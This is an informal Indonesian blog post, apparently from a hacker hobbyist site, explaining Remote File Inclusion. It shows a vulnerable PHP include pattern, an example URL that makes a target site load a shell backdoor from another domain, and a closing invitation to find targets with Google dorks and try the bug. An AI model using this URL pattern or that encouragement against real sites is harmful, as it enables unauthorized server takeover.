Selamat sore hengker disini admin akan berbagi pengetahuan sedikit tentang RFI.Apa sih RFI itu om?yup RFI adalah Remote File Inclusion yakni suatu celah website yang menggunakan fungsi memanggil file melalui inputan didalam url.Dengan bug tersebut seorang hacker dapat memanfaatkan nya dengan memanggil shell backdoor yang ada di website lain yang akan di gunakan untuk menyerang server yang terdapat bug RFI tersebut.

Disini akan saya perlihatkan sedikit codingan yang menyebabkan RFI bisa di exploitasi oleh hacker.

$file = $_GET['file']

include($file)

Baris pertama berfungsi untuk memanggil inputan nama file nya,dan di baris kedua berfungsi untuk menyisipkan file tersebut.Sebagai contoh silahkan lihat gambar di bawah

Pada gambar di atas anda bisa melihat bahwa didepan url page= terdapat suatu halaman website,ya itu adalah website yang sudah tertanam shell backdoor.

Contoh:https://www.nasa.go.id/index.php?page=https://www.bssn.gov/shellmu.php

Contoh di atas adalah suatu serangan RFI yang terjadi pada nasa.go.id dengan memanfaatkan shell backdoor yang berada di bssn.gov.

Tetapi untuk bug seperti ini saya sudah sangat jarang menemukan nya.Dan sekian untuk pengetahuan tentang bug RFI nya mungkin anda anda jika ada yang mau mencoba pepes pindang dorknya di google banyak.Saya akhiri sampai jumpa di lain hari.